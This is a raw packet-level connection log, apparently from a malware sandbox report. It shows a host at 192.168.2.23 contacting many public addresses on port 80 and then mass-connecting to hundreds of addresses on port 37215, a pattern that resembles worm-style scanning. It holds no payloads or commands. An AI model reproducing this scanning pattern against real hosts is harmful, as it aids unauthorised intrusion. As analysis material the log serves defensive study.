                                                          Dec 3, 2024 23:16:48.215867996 CET8058900181.16.202.67192.168.2.23
                                                          Dec 3, 2024 23:16:48.215877056 CET8035012116.59.162.85192.168.2.23
                                                          Dec 3, 2024 23:16:48.215886116 CET8046408107.254.158.162192.168.2.23
                                                          Dec 3, 2024 23:16:48.283588886 CET8044924137.96.172.137192.168.2.23
                                                          Dec 3, 2024 23:16:48.283870935 CET8044966137.96.172.137192.168.2.23
                                                          Dec 3, 2024 23:16:48.284017086 CET4496680192.168.2.23137.96.172.137
                                                          Dec 3, 2024 23:16:48.284017086 CET4496680192.168.2.23137.96.172.137
                                                          Dec 3, 2024 23:16:48.284367085 CET8054912158.229.16.172192.168.2.23
                                                          Dec 3, 2024 23:16:48.284656048 CET8054954158.229.16.172192.168.2.23
                                                          Dec 3, 2024 23:16:48.284699917 CET5495480192.168.2.23158.229.16.172
                                                          Dec 3, 2024 23:16:48.284725904 CET5495480192.168.2.23158.229.16.172
                                                          Dec 3, 2024 23:16:48.285157919 CET806064265.196.231.131192.168.2.23
                                                          Dec 3, 2024 23:16:48.285479069 CET806068465.196.231.131192.168.2.23
                                                          Dec 3, 2024 23:16:48.285516977 CET6068480192.168.2.2365.196.231.131
                                                          Dec 3, 2024 23:16:48.285538912 CET6068480192.168.2.2365.196.231.131
                                                          Dec 3, 2024 23:16:48.285886049 CET806074480.213.14.165192.168.2.23
                                                          Dec 3, 2024 23:16:48.286199093 CET806078680.213.14.165192.168.2.23
                                                          Dec 3, 2024 23:16:48.286261082 CET6078680192.168.2.2380.213.14.165
                                                          Dec 3, 2024 23:16:48.286277056 CET6078680192.168.2.2380.213.14.165
                                                          Dec 3, 2024 23:16:48.286654949 CET8040216149.214.222.91192.168.2.23
                                                          Dec 3, 2024 23:16:48.286933899 CET8040258149.214.222.91192.168.2.23
                                                          Dec 3, 2024 23:16:48.286983967 CET4025880192.168.2.23149.214.222.91
                                                          Dec 3, 2024 23:16:48.287013054 CET4025880192.168.2.23149.214.222.91
                                                          Dec 3, 2024 23:16:48.287276983 CET804732814.201.184.218192.168.2.23
                                                          Dec 3, 2024 23:16:48.287602901 CET804737014.201.184.218192.168.2.23
                                                          Dec 3, 2024 23:16:48.287642956 CET4737080192.168.2.2314.201.184.218
                                                          Dec 3, 2024 23:16:48.287666082 CET4737080192.168.2.2314.201.184.218
                                                          Dec 3, 2024 23:16:48.287729025 CET8055456111.129.118.141192.168.2.23
                                                          Dec 3, 2024 23:16:48.287767887 CET5545680192.168.2.23111.129.118.141
                                                          Dec 3, 2024 23:16:48.287978888 CET8050374118.211.183.67192.168.2.23
                                                          Dec 3, 2024 23:16:48.288289070 CET8050506118.211.183.67192.168.2.23
                                                          Dec 3, 2024 23:16:48.288326025 CET5050680192.168.2.23118.211.183.67
                                                          Dec 3, 2024 23:16:48.288351059 CET5050680192.168.2.23118.211.183.67
                                                          Dec 3, 2024 23:16:48.288626909 CET8041142105.208.107.220192.168.2.23
                                                          Dec 3, 2024 23:16:48.288635969 CET8048502126.128.117.174192.168.2.23
                                                          Dec 3, 2024 23:16:48.288666964 CET4850280192.168.2.23126.128.117.174
                                                          Dec 3, 2024 23:16:48.288861036 CET8041272105.208.107.220192.168.2.23
                                                          Dec 3, 2024 23:16:48.288904905 CET4127280192.168.2.23105.208.107.220
                                                          Dec 3, 2024 23:16:48.288929939 CET4127280192.168.2.23105.208.107.220
                                                          Dec 3, 2024 23:16:48.289179087 CET8048388216.45.248.172192.168.2.23
                                                          Dec 3, 2024 23:16:48.289483070 CET8048518216.45.248.172192.168.2.23
                                                          Dec 3, 2024 23:16:48.289525986 CET4851880192.168.2.23216.45.248.172
                                                          Dec 3, 2024 23:16:48.289550066 CET4851880192.168.2.23216.45.248.172
                                                          Dec 3, 2024 23:16:48.289863110 CET804141884.171.71.67192.168.2.23
                                                          Dec 3, 2024 23:16:48.290030956 CET804154884.171.71.67192.168.2.23
                                                          Dec 3, 2024 23:16:48.290066004 CET4154880192.168.2.2384.171.71.67
                                                          Dec 3, 2024 23:16:48.290092945 CET4154880192.168.2.2384.171.71.67
                                                          Dec 3, 2024 23:16:48.291047096 CET8047266161.47.72.130192.168.2.23
                                                          Dec 3, 2024 23:16:48.291086912 CET4726680192.168.2.23161.47.72.130
                                                          Dec 3, 2024 23:16:48.291116953 CET4726680192.168.2.23161.47.72.130
                                                          Dec 3, 2024 23:16:48.291294098 CET8036494199.96.168.179192.168.2.23
                                                          Dec 3, 2024 23:16:48.291599035 CET8036534199.96.168.179192.168.2.23
                                                          Dec 3, 2024 23:16:48.291642904 CET3653480192.168.2.23199.96.168.179
                                                          Dec 3, 2024 23:16:48.291666985 CET3653480192.168.2.23199.96.168.179
                                                          Dec 3, 2024 23:16:48.323904991 CET8044924137.96.172.137192.168.2.23
                                                          Dec 3, 2024 23:16:48.328054905 CET804732814.201.184.218192.168.2.23
                                                          Dec 3, 2024 23:16:48.328066111 CET8040216149.214.222.91192.168.2.23
                                                          Dec 3, 2024 23:16:48.328135014 CET806074480.213.14.165192.168.2.23
                                                          Dec 3, 2024 23:16:48.328142881 CET806064265.196.231.131192.168.2.23
                                                          Dec 3, 2024 23:16:48.328150034 CET8054912158.229.16.172192.168.2.23
                                                          Dec 3, 2024 23:16:48.331882000 CET8036494199.96.168.179192.168.2.23
                                                          Dec 3, 2024 23:16:48.331890106 CET804141884.171.71.67192.168.2.23
                                                          Dec 3, 2024 23:16:48.331907988 CET8048388216.45.248.172192.168.2.23
                                                          Dec 3, 2024 23:16:48.331917048 CET8041142105.208.107.220192.168.2.23
                                                          Dec 3, 2024 23:16:48.331921101 CET8050374118.211.183.67192.168.2.23
                                                          Dec 3, 2024 23:16:48.407844067 CET8044966137.96.172.137192.168.2.23
                                                          Dec 3, 2024 23:16:48.407982111 CET8044966137.96.172.137192.168.2.23
                                                          Dec 3, 2024 23:16:48.408113956 CET4496680192.168.2.23137.96.172.137
                                                          Dec 3, 2024 23:16:48.408505917 CET8054954158.229.16.172192.168.2.23
                                                          Dec 3, 2024 23:16:48.408551931 CET5495480192.168.2.23158.229.16.172
                                                          Dec 3, 2024 23:16:48.409390926 CET806068465.196.231.131192.168.2.23
                                                          Dec 3, 2024 23:16:48.409429073 CET6068480192.168.2.2365.196.231.131
                                                          Dec 3, 2024 23:16:48.410063028 CET806078680.213.14.165192.168.2.23
                                                          Dec 3, 2024 23:16:48.410110950 CET6078680192.168.2.2380.213.14.165
                                                          Dec 3, 2024 23:16:48.410948992 CET8040258149.214.222.91192.168.2.23
                                                          Dec 3, 2024 23:16:48.410991907 CET4025880192.168.2.23149.214.222.91
                                                          Dec 3, 2024 23:16:48.411581993 CET804737014.201.184.218192.168.2.23
                                                          Dec 3, 2024 23:16:48.411622047 CET4737080192.168.2.2314.201.184.218
                                                          Dec 3, 2024 23:16:48.412153959 CET8050506118.211.183.67192.168.2.23
                                                          Dec 3, 2024 23:16:48.412195921 CET5050680192.168.2.23118.211.183.67
                                                          Dec 3, 2024 23:16:48.412838936 CET8041272105.208.107.220192.168.2.23
                                                          Dec 3, 2024 23:16:48.412879944 CET4127280192.168.2.23105.208.107.220
                                                          Dec 3, 2024 23:16:48.413451910 CET8048518216.45.248.172192.168.2.23
                                                          Dec 3, 2024 23:16:48.413505077 CET4851880192.168.2.23216.45.248.172
                                                          Dec 3, 2024 23:16:48.414010048 CET804154884.171.71.67192.168.2.23
                                                          Dec 3, 2024 23:16:48.414047003 CET4154880192.168.2.2384.171.71.67
                                                          Dec 3, 2024 23:16:48.414926052 CET8047266161.47.72.130192.168.2.23
                                                          Dec 3, 2024 23:16:48.414980888 CET4726680192.168.2.23161.47.72.130
                                                          Dec 3, 2024 23:16:48.415482998 CET8036534199.96.168.179192.168.2.23
                                                          Dec 3, 2024 23:16:48.415524006 CET3653480192.168.2.23199.96.168.179
                                                          Dec 3, 2024 23:16:48.583494902 CET5079637215192.168.2.23156.213.87.168
                                                          Dec 3, 2024 23:16:48.583494902 CET5761837215192.168.2.23156.124.55.110
                                                          Dec 3, 2024 23:16:48.583496094 CET5649237215192.168.2.2341.50.74.64
                                                          Dec 3, 2024 23:16:48.647417068 CET5785880192.168.2.23204.71.210.36
                                                          Dec 3, 2024 23:16:48.707282066 CET3721550796156.213.87.168192.168.2.23
                                                          Dec 3, 2024 23:16:48.707324982 CET372155649241.50.74.64192.168.2.23
                                                          Dec 3, 2024 23:16:48.707356930 CET3721557618156.124.55.110192.168.2.23
                                                          Dec 3, 2024 23:16:48.707529068 CET4059737215192.168.2.23156.127.13.240
                                                          Dec 3, 2024 23:16:48.707529068 CET4059737215192.168.2.23197.81.131.1
                                                          Dec 3, 2024 23:16:48.707530022 CET4059737215192.168.2.23197.120.27.107
                                                          Dec 3, 2024 23:16:48.707534075 CET4059737215192.168.2.23197.3.73.65
                                                          Dec 3, 2024 23:16:48.707534075 CET4059737215192.168.2.23156.225.40.131
                                                          Dec 3, 2024 23:16:48.707534075 CET4059737215192.168.2.23156.196.177.232
                                                          Dec 3, 2024 23:16:48.707534075 CET4059737215192.168.2.23156.47.233.200
                                                          Dec 3, 2024 23:16:48.707534075 CET4059737215192.168.2.2341.240.1.22
                                                          Dec 3, 2024 23:16:48.707535028 CET4059737215192.168.2.23156.153.176.175
                                                          Dec 3, 2024 23:16:48.707535028 CET4059737215192.168.2.2341.28.122.113
                                                          Dec 3, 2024 23:16:48.707537889 CET4059737215192.168.2.23156.42.173.143
                                                          Dec 3, 2024 23:16:48.707541943 CET4059737215192.168.2.23197.170.158.13
                                                          Dec 3, 2024 23:16:48.707541943 CET4059737215192.168.2.23197.45.230.253
                                                          Dec 3, 2024 23:16:48.707545042 CET5079637215192.168.2.23156.213.87.168
                                                          Dec 3, 2024 23:16:48.707554102 CET4059737215192.168.2.2341.181.27.30
                                                          Dec 3, 2024 23:16:48.707655907 CET5649237215192.168.2.2341.50.74.64
                                                          Dec 3, 2024 23:16:48.707655907 CET4059737215192.168.2.23197.142.95.104
                                                          Dec 3, 2024 23:16:48.707655907 CET4059737215192.168.2.23156.113.104.220
                                                          Dec 3, 2024 23:16:48.707655907 CET4059737215192.168.2.23156.54.52.64
                                                          Dec 3, 2024 23:16:48.707655907 CET4059737215192.168.2.23156.2.32.205
                                                          Dec 3, 2024 23:16:48.707655907 CET4059737215192.168.2.23197.68.34.74
                                                          Dec 3, 2024 23:16:48.707662106 CET4059737215192.168.2.23197.48.57.207
                                                          Dec 3, 2024 23:16:48.707662106 CET4059737215192.168.2.23197.81.114.155
                                                          Dec 3, 2024 23:16:48.707662106 CET4059737215192.168.2.2341.118.107.113
                                                          Dec 3, 2024 23:16:48.707663059 CET4059737215192.168.2.2341.23.152.112
                                                          Dec 3, 2024 23:16:48.707662106 CET4059737215192.168.2.23197.165.144.19
                                                          Dec 3, 2024 23:16:48.707663059 CET4059737215192.168.2.23197.28.236.190
                                                          Dec 3, 2024 23:16:48.707662106 CET4059737215192.168.2.23197.101.175.187
                                                          Dec 3, 2024 23:16:48.707665920 CET4059737215192.168.2.23197.22.3.218
                                                          Dec 3, 2024 23:16:48.707663059 CET4059737215192.168.2.23197.21.86.41
                                                          Dec 3, 2024 23:16:48.707665920 CET4059737215192.168.2.23156.151.133.165
                                                          Dec 3, 2024 23:16:48.707663059 CET4059737215192.168.2.23156.100.226.34
                                                          Dec 3, 2024 23:16:48.707667112 CET5761837215192.168.2.23156.124.55.110
                                                          Dec 3, 2024 23:16:48.707663059 CET4059737215192.168.2.2341.244.31.150
                                                          Dec 3, 2024 23:16:48.707667112 CET4059737215192.168.2.23156.191.5.57
                                                          Dec 3, 2024 23:16:48.707665920 CET4059737215192.168.2.23197.69.184.39
                                                          Dec 3, 2024 23:16:48.707670927 CET4059737215192.168.2.23156.245.131.47
                                                          Dec 3, 2024 23:16:48.707665920 CET4059737215192.168.2.23156.204.86.66
                                                          Dec 3, 2024 23:16:48.707670927 CET4059737215192.168.2.23197.36.174.121
                                                          Dec 3, 2024 23:16:48.707670927 CET4059737215192.168.2.23156.248.237.161
                                                          Dec 3, 2024 23:16:48.707670927 CET4059737215192.168.2.23156.142.132.70
                                                          Dec 3, 2024 23:16:48.707670927 CET4059737215192.168.2.23156.48.44.46
                                                          Dec 3, 2024 23:16:48.707670927 CET4059737215192.168.2.2341.186.217.161
                                                          Dec 3, 2024 23:16:48.707667112 CET4059737215192.168.2.23156.43.87.207
                                                          Dec 3, 2024 23:16:48.707665920 CET4059737215192.168.2.23197.78.53.218
                                                          Dec 3, 2024 23:16:48.707670927 CET4059737215192.168.2.2341.50.23.255
                                                          Dec 3, 2024 23:16:48.707667112 CET4059737215192.168.2.2341.193.178.53
                                                          Dec 3, 2024 23:16:48.707670927 CET4059737215192.168.2.2341.105.12.144
                                                          Dec 3, 2024 23:16:48.707670927 CET4059737215192.168.2.23197.244.111.212
                                                          Dec 3, 2024 23:16:48.707670927 CET4059737215192.168.2.23197.167.181.150
                                                          Dec 3, 2024 23:16:48.707668066 CET4059737215192.168.2.2341.199.42.109
                                                          Dec 3, 2024 23:16:48.707670927 CET4059737215192.168.2.23156.7.96.193
                                                          Dec 3, 2024 23:16:48.707668066 CET4059737215192.168.2.23156.160.16.252
                                                          Dec 3, 2024 23:16:48.707670927 CET4059737215192.168.2.23156.79.85.120
                                                          Dec 3, 2024 23:16:48.707670927 CET4059737215192.168.2.23197.242.23.150
                                                          Dec 3, 2024 23:16:48.707672119 CET4059737215192.168.2.23197.219.141.214
                                                          Dec 3, 2024 23:16:48.707670927 CET4059737215192.168.2.23197.68.87.121
                                                          Dec 3, 2024 23:16:48.707668066 CET4059737215192.168.2.2341.188.119.185
                                                          Dec 3, 2024 23:16:48.707672119 CET4059737215192.168.2.2341.17.151.227
                                                          Dec 3, 2024 23:16:48.707722902 CET4059737215192.168.2.2341.126.79.111
                                                          Dec 3, 2024 23:16:48.707722902 CET4059737215192.168.2.2341.114.246.226
                                                          Dec 3, 2024 23:16:48.707722902 CET4059737215192.168.2.23197.253.80.150
                                                          Dec 3, 2024 23:16:48.707731962 CET4059737215192.168.2.2341.118.120.115
                                                          Dec 3, 2024 23:16:48.707731962 CET4059737215192.168.2.23156.2.9.250
                                                          Dec 3, 2024 23:16:48.707731962 CET4059737215192.168.2.2341.135.23.185
                                                          Dec 3, 2024 23:16:48.707784891 CET4059737215192.168.2.23197.181.43.122
                                                          Dec 3, 2024 23:16:48.707784891 CET4059737215192.168.2.23156.68.138.118
                                                          Dec 3, 2024 23:16:48.707784891 CET4059737215192.168.2.23156.168.74.157
                                                          Dec 3, 2024 23:16:48.707784891 CET4059737215192.168.2.23156.94.18.16
                                                          Dec 3, 2024 23:16:48.707784891 CET4059737215192.168.2.23197.47.192.122
                                                          Dec 3, 2024 23:16:48.707784891 CET4059737215192.168.2.2341.58.221.166
                                                          Dec 3, 2024 23:16:48.707787037 CET4059737215192.168.2.23156.183.171.17
                                                          Dec 3, 2024 23:16:48.707784891 CET4059737215192.168.2.23197.234.54.3
                                                          Dec 3, 2024 23:16:48.707787037 CET4059737215192.168.2.2341.152.47.119
                                                          Dec 3, 2024 23:16:48.707787037 CET4059737215192.168.2.2341.66.243.108
                                                          Dec 3, 2024 23:16:48.707787037 CET4059737215192.168.2.23197.43.110.147
                                                          Dec 3, 2024 23:16:48.707787037 CET4059737215192.168.2.2341.30.146.127
                                                          Dec 3, 2024 23:16:48.707789898 CET4059737215192.168.2.23197.57.43.212
                                                          Dec 3, 2024 23:16:48.707787037 CET4059737215192.168.2.23156.26.122.225
                                                          Dec 3, 2024 23:16:48.707789898 CET4059737215192.168.2.23156.238.66.58
                                                          Dec 3, 2024 23:16:48.707787037 CET4059737215192.168.2.2341.251.241.94
                                                          Dec 3, 2024 23:16:48.707792997 CET4059737215192.168.2.2341.89.159.237
                                                          Dec 3, 2024 23:16:48.707787037 CET4059737215192.168.2.23156.168.74.109
                                                          Dec 3, 2024 23:16:48.707787037 CET4059737215192.168.2.2341.92.204.208
                                                          Dec 3, 2024 23:16:48.707792997 CET4059737215192.168.2.23156.68.212.227
                                                          Dec 3, 2024 23:16:48.707789898 CET4059737215192.168.2.23197.172.148.246
                                                          Dec 3, 2024 23:16:48.707792997 CET4059737215192.168.2.2341.189.150.90
                                                          Dec 3, 2024 23:16:48.707787991 CET4059737215192.168.2.23197.84.193.182
                                                          Dec 3, 2024 23:16:48.707787037 CET4059737215192.168.2.23197.143.220.214
                                                          Dec 3, 2024 23:16:48.707796097 CET4059737215192.168.2.23156.35.32.60
                                                          Dec 3, 2024 23:16:48.707791090 CET4059737215192.168.2.23197.103.172.30
                                                          Dec 3, 2024 23:16:48.707787037 CET4059737215192.168.2.23197.134.242.126
                                                          Dec 3, 2024 23:16:48.707792997 CET4059737215192.168.2.2341.78.253.104
                                                          Dec 3, 2024 23:16:48.707787991 CET4059737215192.168.2.2341.96.91.223
                                                          Dec 3, 2024 23:16:48.707798004 CET4059737215192.168.2.23156.70.104.213
                                                          Dec 3, 2024 23:16:48.707796097 CET4059737215192.168.2.23156.146.17.156
                                                          Dec 3, 2024 23:16:48.707798004 CET4059737215192.168.2.23197.233.213.182
                                                          Dec 3, 2024 23:16:48.707796097 CET4059737215192.168.2.23197.122.115.237
                                                          Dec 3, 2024 23:16:48.707787037 CET4059737215192.168.2.23156.33.17.247
                                                          Dec 3, 2024 23:16:48.707796097 CET4059737215192.168.2.2341.49.47.48
                                                          Dec 3, 2024 23:16:48.707798004 CET4059737215192.168.2.23197.118.127.30
                                                          Dec 3, 2024 23:16:48.707787037 CET4059737215192.168.2.23197.83.5.214
                                                          Dec 3, 2024 23:16:48.707798004 CET4059737215192.168.2.23197.35.214.128
                                                          Dec 3, 2024 23:16:48.707796097 CET4059737215192.168.2.23156.115.228.9
                                                          Dec 3, 2024 23:16:48.707798004 CET4059737215192.168.2.2341.28.139.238
                                                          Dec 3, 2024 23:16:48.707796097 CET4059737215192.168.2.2341.103.214.56
                                                          Dec 3, 2024 23:16:48.707798004 CET4059737215192.168.2.2341.178.152.119
                                                          Dec 3, 2024 23:16:48.707796097 CET4059737215192.168.2.23156.146.153.220
                                                          Dec 3, 2024 23:16:48.707798004 CET4059737215192.168.2.2341.211.186.139
                                                          Dec 3, 2024 23:16:48.707796097 CET4059737215192.168.2.2341.44.159.181
                                                          Dec 3, 2024 23:16:48.707798004 CET4059737215192.168.2.23197.11.226.129
                                                          Dec 3, 2024 23:16:48.707820892 CET4059737215192.168.2.2341.129.71.135
                                                          Dec 3, 2024 23:16:48.707820892 CET4059737215192.168.2.23156.125.210.211
                                                          Dec 3, 2024 23:16:48.707822084 CET4059737215192.168.2.23156.153.17.53
                                                          Dec 3, 2024 23:16:48.707822084 CET4059737215192.168.2.23156.28.115.110
                                                          Dec 3, 2024 23:16:48.707822084 CET4059737215192.168.2.2341.84.37.30
                                                          Dec 3, 2024 23:16:48.707822084 CET4059737215192.168.2.23197.71.234.92
                                                          Dec 3, 2024 23:16:48.707822084 CET4059737215192.168.2.23197.235.159.119
                                                          Dec 3, 2024 23:16:48.707885981 CET4059737215192.168.2.23156.244.19.8
                                                          Dec 3, 2024 23:16:48.707886934 CET4059737215192.168.2.2341.199.205.242
                                                          Dec 3, 2024 23:16:48.707886934 CET4059737215192.168.2.23197.107.141.110
                                                          Dec 3, 2024 23:16:48.707886934 CET4059737215192.168.2.23197.216.90.125
                                                          Dec 3, 2024 23:16:48.707886934 CET4059737215192.168.2.2341.114.20.58
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.23156.1.235.13
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.23156.121.78.1
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.23197.116.102.172
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.23197.215.225.44
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.23197.90.94.98
                                                          Dec 3, 2024 23:16:48.707890034 CET4059737215192.168.2.23156.209.132.36
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.23156.91.29.247
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.2341.97.76.234
                                                          Dec 3, 2024 23:16:48.707890034 CET4059737215192.168.2.2341.18.133.111
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.2341.172.19.177
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.2341.39.53.89
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.2341.196.174.78
                                                          Dec 3, 2024 23:16:48.707891941 CET4059737215192.168.2.2341.127.93.20
                                                          Dec 3, 2024 23:16:48.707890987 CET4059737215192.168.2.23156.128.174.3
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.23156.166.200.242
                                                          Dec 3, 2024 23:16:48.707890034 CET4059737215192.168.2.23156.89.224.90
                                                          Dec 3, 2024 23:16:48.707891941 CET4059737215192.168.2.23197.48.21.28
                                                          Dec 3, 2024 23:16:48.707890987 CET4059737215192.168.2.23197.180.197.146
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.2341.135.116.83
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.23197.61.217.88
                                                          Dec 3, 2024 23:16:48.707891941 CET4059737215192.168.2.23197.200.84.140
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.23197.88.41.27
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.23197.244.89.167
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.2341.149.203.138
                                                          Dec 3, 2024 23:16:48.707890034 CET4059737215192.168.2.23197.250.134.110
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.23197.33.240.52
                                                          Dec 3, 2024 23:16:48.707890034 CET4059737215192.168.2.23197.165.182.243
                                                          Dec 3, 2024 23:16:48.707890987 CET4059737215192.168.2.2341.51.41.137
                                                          Dec 3, 2024 23:16:48.707891941 CET4059737215192.168.2.23197.173.217.174
                                                          Dec 3, 2024 23:16:48.707890034 CET4059737215192.168.2.23156.44.165.203
                                                          Dec 3, 2024 23:16:48.707892895 CET4059737215192.168.2.2341.84.208.49
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.2341.117.97.196
                                                          Dec 3, 2024 23:16:48.707890034 CET4059737215192.168.2.23156.238.5.158
                                                          Dec 3, 2024 23:16:48.707890987 CET4059737215192.168.2.23197.59.206.217
                                                          Dec 3, 2024 23:16:48.707892895 CET4059737215192.168.2.2341.106.186.21
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.2341.49.79.167
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.23156.169.175.134
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.23197.123.130.183
                                                          Dec 3, 2024 23:16:48.707916021 CET4059737215192.168.2.2341.225.221.206
                                                          Dec 3, 2024 23:16:48.707890034 CET4059737215192.168.2.2341.48.240.221
                                                          Dec 3, 2024 23:16:48.707890034 CET4059737215192.168.2.2341.149.32.31
                                                          Dec 3, 2024 23:16:48.707890034 CET4059737215192.168.2.23197.70.154.255
                                                          Dec 3, 2024 23:16:48.707916021 CET4059737215192.168.2.2341.136.231.46
                                                          Dec 3, 2024 23:16:48.707890034 CET4059737215192.168.2.23156.152.87.92
                                                          Dec 3, 2024 23:16:48.707916021 CET4059737215192.168.2.2341.5.18.160
                                                          Dec 3, 2024 23:16:48.707890034 CET4059737215192.168.2.23197.180.53.126
                                                          Dec 3, 2024 23:16:48.707916021 CET4059737215192.168.2.23197.78.203.98
                                                          Dec 3, 2024 23:16:48.707890034 CET4059737215192.168.2.23197.200.72.217
                                                          Dec 3, 2024 23:16:48.707890987 CET4059737215192.168.2.23156.175.144.254
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.23197.134.44.32
                                                          Dec 3, 2024 23:16:48.707890987 CET4059737215192.168.2.23197.96.37.185
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.23197.126.167.101
                                                          Dec 3, 2024 23:16:48.707890987 CET4059737215192.168.2.2341.22.215.22
                                                          Dec 3, 2024 23:16:48.707889080 CET4059737215192.168.2.23156.176.128.173
                                                          Dec 3, 2024 23:16:48.707890987 CET4059737215192.168.2.23156.134.166.63
                                                          Dec 3, 2024 23:16:48.707926989 CET4059737215192.168.2.23197.50.252.188
                                                          Dec 3, 2024 23:16:48.707926989 CET4059737215192.168.2.2341.8.126.15
                                                          Dec 3, 2024 23:16:48.707926989 CET4059737215192.168.2.23197.47.95.98
                                                          Dec 3, 2024 23:16:48.707926989 CET4059737215192.168.2.2341.129.232.63
                                                          Dec 3, 2024 23:16:48.707926989 CET4059737215192.168.2.2341.215.201.51
                                                          Dec 3, 2024 23:16:48.707926989 CET4059737215192.168.2.23156.226.153.61
                                                          Dec 3, 2024 23:16:48.707926989 CET4059737215192.168.2.23197.76.12.132
                                                          Dec 3, 2024 23:16:48.707926989 CET4059737215192.168.2.2341.97.229.8
                                                          Dec 3, 2024 23:16:48.707933903 CET4059737215192.168.2.23197.81.83.16
                                                          Dec 3, 2024 23:16:48.707933903 CET4059737215192.168.2.2341.212.187.42
                                                          Dec 3, 2024 23:16:48.707936049 CET4059737215192.168.2.23197.39.148.12
                                                          Dec 3, 2024 23:16:48.707937002 CET4059737215192.168.2.23197.115.3.78
                                                          Dec 3, 2024 23:16:48.707936049 CET4059737215192.168.2.2341.253.86.57
                                                          Dec 3, 2024 23:16:48.707937002 CET4059737215192.168.2.23197.230.74.101
                                                          Dec 3, 2024 23:16:48.707938910 CET4059737215192.168.2.23156.186.196.13
                                                          Dec 3, 2024 23:16:48.707937002 CET4059737215192.168.2.23197.140.2.178
                                                          Dec 3, 2024 23:16:48.707936049 CET4059737215192.168.2.23156.199.155.113
                                                          Dec 3, 2024 23:16:48.707937002 CET4059737215192.168.2.2341.160.104.112
                                                          Dec 3, 2024 23:16:48.707940102 CET4059737215192.168.2.2341.160.175.167
                                                          Dec 3, 2024 23:16:48.707937002 CET4059737215192.168.2.23156.248.233.245
                                                          Dec 3, 2024 23:16:48.707941055 CET4059737215192.168.2.23156.87.98.102
                                                          Dec 3, 2024 23:16:48.707942009 CET4059737215192.168.2.2341.82.183.57
                                                          Dec 3, 2024 23:16:48.707940102 CET4059737215192.168.2.2341.143.210.119
                                                          Dec 3, 2024 23:16:48.707936049 CET4059737215192.168.2.23197.84.103.46
                                                          Dec 3, 2024 23:16:48.707942009 CET4059737215192.168.2.23197.4.141.117
                                                          Dec 3, 2024 23:16:48.707936049 CET4059737215192.168.2.23197.24.29.199
                                                          Dec 3, 2024 23:16:48.707940102 CET4059737215192.168.2.23156.27.62.173
                                                          Dec 3, 2024 23:16:48.707940102 CET4059737215192.168.2.23156.54.51.18
                                                          Dec 3, 2024 23:16:48.707941055 CET4059737215192.168.2.2341.67.51.126
                                                          Dec 3, 2024 23:16:48.707940102 CET4059737215192.168.2.23197.81.224.69
                                                          Dec 3, 2024 23:16:48.707941055 CET4059737215192.168.2.2341.84.56.237
                                                          Dec 3, 2024 23:16:48.707940102 CET4059737215192.168.2.2341.245.63.51
                                                          Dec 3, 2024 23:16:48.707936049 CET4059737215192.168.2.2341.181.104.95
                                                          Dec 3, 2024 23:16:48.707952023 CET4059737215192.168.2.2341.59.140.64
                                                          Dec 3, 2024 23:16:48.707941055 CET4059737215192.168.2.2341.165.238.46
                                                          Dec 3, 2024 23:16:48.707938910 CET4059737215192.168.2.23156.114.154.111
                                                          Dec 3, 2024 23:16:48.707941055 CET4059737215192.168.2.2341.124.212.91
                                                          Dec 3, 2024 23:16:48.707940102 CET4059737215192.168.2.2341.212.57.122
                                                          Dec 3, 2024 23:16:48.707937002 CET4059737215192.168.2.23156.218.166.144
                                                          Dec 3, 2024 23:16:48.707940102 CET4059737215192.168.2.23197.204.131.126
                                                          Dec 3, 2024 23:16:48.707937002 CET4059737215192.168.2.2341.69.237.95
                                                          Dec 3, 2024 23:16:48.707941055 CET4059737215192.168.2.23156.141.254.170
                                                          Dec 3, 2024 23:16:48.707940102 CET4059737215192.168.2.23156.132.97.5
                                                          Dec 3, 2024 23:16:48.707941055 CET4059737215192.168.2.23197.225.170.25
                                                          Dec 3, 2024 23:16:48.707940102 CET4059737215192.168.2.2341.156.127.153
                                                          Dec 3, 2024 23:16:48.707937002 CET4059737215192.168.2.23197.106.255.242
                                                          Dec 3, 2024 23:16:48.707941055 CET4059737215192.168.2.23197.110.57.158
                                                          Dec 3, 2024 23:16:48.707940102 CET4059737215192.168.2.23156.187.183.47
                                                          Dec 3, 2024 23:16:48.707940102 CET4059737215192.168.2.23156.78.87.245
                                                          Dec 3, 2024 23:16:48.707938910 CET4059737215192.168.2.23156.211.170.38
                                                          Dec 3, 2024 23:16:48.707940102 CET4059737215192.168.2.2341.136.11.118
                                                          Dec 3, 2024 23:16:48.707938910 CET4059737215192.168.2.2341.139.17.106
                                                          Dec 3, 2024 23:16:48.707941055 CET4059737215192.168.2.23197.37.107.248
                                                          Dec 3, 2024 23:16:48.707940102 CET4059737215192.168.2.2341.146.26.136
                                                          Dec 3, 2024 23:16:48.707938910 CET4059737215192.168.2.23156.86.184.115
                                                          Dec 3, 2024 23:16:48.707952023 CET4059737215192.168.2.23197.196.200.220
                                                          Dec 3, 2024 23:16:48.707938910 CET4059737215192.168.2.23197.114.238.100
                                                          Dec 3, 2024 23:16:48.707936049 CET4059737215192.168.2.23197.111.118.76
                                                          Dec 3, 2024 23:16:48.707938910 CET4059737215192.168.2.23156.1.229.34
                                                          Dec 3, 2024 23:16:48.707940102 CET4059737215192.168.2.23197.186.98.153
